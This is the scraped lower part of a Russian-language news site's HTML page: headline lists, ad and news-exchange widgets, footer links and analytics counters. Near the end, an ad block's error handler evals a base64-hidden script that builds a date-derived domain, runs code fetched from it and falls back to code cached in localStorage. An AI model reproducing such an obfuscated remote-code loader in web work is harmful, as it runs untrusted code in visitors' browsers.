	<strong title="Фотофакт: в Киеве появился Renault Laguna на редчайших номерах">Фотофакт: в Киеве появился Renault Laguna на редчайших номерах</strong></a><b>14568</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/334773-vrachi-rasskazali-o-vrede-pomidorov.html"><span>18.07-17:49</span>
	<strong title="Врачи рассказали о вреде помидоров">Врачи рассказали о вреде помидоров</strong></a><b>14300</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/335500-mediki-nazvali-glavnye-prichiny-polyubit-cvetnuyu-kapustu.html"><span>21.07-11:56</span>
	<strong title="Медики назвали главные причины полюбить цветную капусту">Медики назвали главные причины полюбить цветную капусту</strong></a><b>12820</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/335795-mediki-podskazali-kak-normalizovat-davlenie-bez-tabletok.html"><span>22.07-14:33</span>
	<strong title="Медики подсказали, как нормализовать давление без таблеток">Медики подсказали, как нормализовать давление без таблеток</strong></a><b>12439</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/335799-do-slez-tina-karol-rastrogala-fanatov-otkrovennym-priznaniem.html"><span>22.07-14:43</span>
	<strong title="До слез: Тина Кароль растрогала фанатов откровенным признанием">До слез: Тина Кароль растрогала фанатов откровенным признанием</strong></a><b>10514</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kurjozy/334310-vygulyal-samye-vysokie-kabluki-putin-nasmeshil-svezhim-snimkom.html"><span>17.07-09:32</span>
	<strong title="Выгулял самые высокие каблуки: Путин насмешил свежим снимком">Выгулял самые высокие каблуки: Путин насмешил свежим снимком</strong></a><b>9698</b><div class="category_lastn_date" title="Курьезы">&nbsp;&nbsp;<a href="http://hronika.info/kurjozy/">Курьезы</a></div>
</div>
		</div>			         
	</div>
</div>
 <div class="clr"></div>
 
					
</div>

            
  
          
          <div class="wrap">
              <div id="bn_9bfe796fdf">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.9bfe796fdf.js"></script>
              <h3>Интересные новости</h3>
              <!-- noindex --><div id="n4p_31957">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/31/ticker_31957.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script><!--/ noindex -->
              <!--noindex -->
<!-- MarketGidNews Start -->
<div id="MarketGidScriptRootN8362" class="news-block-magick">
    <div id="MarketGidPreloadN8362">
        <a id="mg_add8362" href="http://usr.marketgid.com/demo/celevie-posetiteli/" rel="nofollow" target="_blank"><img src="//cdn.marketgid.com/images/marketgid_add_link.png" style="border:0px"></a><br>        <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN8362")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN8362");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=8362;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/h/r/hronika.info.8362.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- MarketGidNews End -->
<!--/noindex-->
              <!--noindex-->
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN14129" class="news-block-magick">
    <div id="LentaInformPreloadN14129">
                <a href="http://lentainform.com/" target="_blank">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN14129")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN14129");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=14129;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/h/r/hronika.info.14129.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->
<!--/noindex -->
              <div class="join_informer_3674" id="join_informer_3674"></div>

<!-- Асинхронный код, 10.02.2016 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "//partner.join.com.ua/async/3674/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->
             </div>		        
          
          
          <div class="wrap">
            	<h3>Мы в Фейсбук</h3>
              <!--noindex--><div class="fb-page" data-href="https://www.facebook.com/Hronika.info/" data-width="300" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/Hronika.info/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Hronika.info/">Хроника мировых событий</a></blockquote></div><!--/noindex-->
			</div>
          
        
          <!--<div class="wrap">
            	<h3>Наш опрос</h3>
		        
			</div>
        -->
       
       		   </div>

            
  
                 
      </aside>
                      <div class="fullstory_bottom">
         <div class="bshadow">
		 
         <div class="clr"></div>
         </div>
      </div> 

        </section> 
      </div>
      <footer id="footer">
        <div class="maxw">			<nav class="footbut">
				<ul class="clr reset">
				    <li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
</script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"><!--noindex-->
<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?165947';" title="Rated by I.UA">
<script type="text/javascript"><!--
iS='http'+(window.location.protocol=='https:'?'s':'')+
'://r.i.ua/s?u165947&p164&n'+Math.random();
iD=document;if(!iD.cookie)iD.cookie="b=b; path=/";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iR=iD.referrer.replace(iP=/^[a-z]*:\/\//,'');iH=window.location.href.replace(iP,'');
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iR);
iS+='&r'+escape(iH);
iD.write('<img src="'+iS+'" border="0" width="88" height="31" />');
//--></script></a><!-- End of I.UA counter -->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;



МИР
















</b>
              <a class="close7">X</a>
            </div>



<div class="vsplivayushee-okno">
    <span class="spandate">24.07-01:15</span>
	<strong title="В Турции прошли массовые облавы на боевиков ИГИЛ"><a href="http://hronika.info/mir/336219-v-turcii-proshli-massovye-oblavy-na-boevikov-igil.html">В Турции прошли массовые облавы на боевиков ИГИЛ</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.07-00:09</span>
	<strong title="Шииты призвали Путина ввести войска в Йемен"><a href="http://hronika.info/mir/336213-shiity-prizvali-putina-vvesti-voyska-v-yemen.html">Шииты призвали Путина ввести войска в Йемен</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">23.07-23:10</span>
	<strong title="Трамп уверяет, что не сделал ни одной уступки Путину"><a href="http://hronika.info/mir/336204-tramp-uveryaet-chto-ne-sdelal-ni-odnoy-ustupki-putinu.html">Трамп уверяет, что не сделал ни одной уступки</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">23.07-21:30</span>
	<strong title="В Египте уничтожен один из лидеров ИГ"><a href="http://hronika.info/mir/336188-v-egipte-unichtozhen-odin-iz-liderov-ig.html">В Египте уничтожен один из лидеров ИГ</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">23.07-19:14</span>
	<strong title="ИГ совершило крупнейшую за последние годы атаку"><a href="http://hronika.info/mir/336165-ig-sovershilo-krupneyshuyu-za-poslednie-gody-ataku.html">ИГ совершило крупнейшую за последние годы атаку</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">23.07-17:53</span>
	<strong title="В британском магазине облили кислотой трехлетнего мальчика"><a href="http://hronika.info/mir/336150-v-britanskom-magazine-oblili-kislotoy-trehletnego-malchika.html">В британском магазине облили кислотой трехлетнего</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">23.07-17:12</span>
	<strong title="Названы самые дорогие города для жизни в мире"><a href="http://hronika.info/mir/336136-nazvany-samye-dorogie-goroda-dlya-zhizni-v-mire.html">Названы самые дорогие города для жизни в мире</a></strong>			
</div>





















            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
<div id="MIXADV_4430" class="MIXADVERT_NET"></div>
          <script> 
          var node4430 = document.getElementById("MIXADV_4430");
          if( node4430 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4430&r="+Math.random();
               node4430.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDQzMCAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0NDMwLnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzZXRUaW1lb3V0KCBmdW5jdGlvbiAoKSB7c2NyaXB0X2ZpcnN0LnJlbW92ZSgpfSwgNDAwMCk7c2NyaXB0X2ZpcnN0Lm9uZXJyb3IgPSBmdW5jdGlvbigpeyBzZXRUaW1lb3V0KCBmdW5jdGlvbiAoKSB7IGlmKCBub2RlNDQzMC5pbm5lckhUTUwgPT0gIiIgKSB3aW5kb3cuZXZhbChsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgiNDQzMCIpKSB9LCA1MDAwKTsgIDt9OyA=") );
              }
          }
          </script> 
 
</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
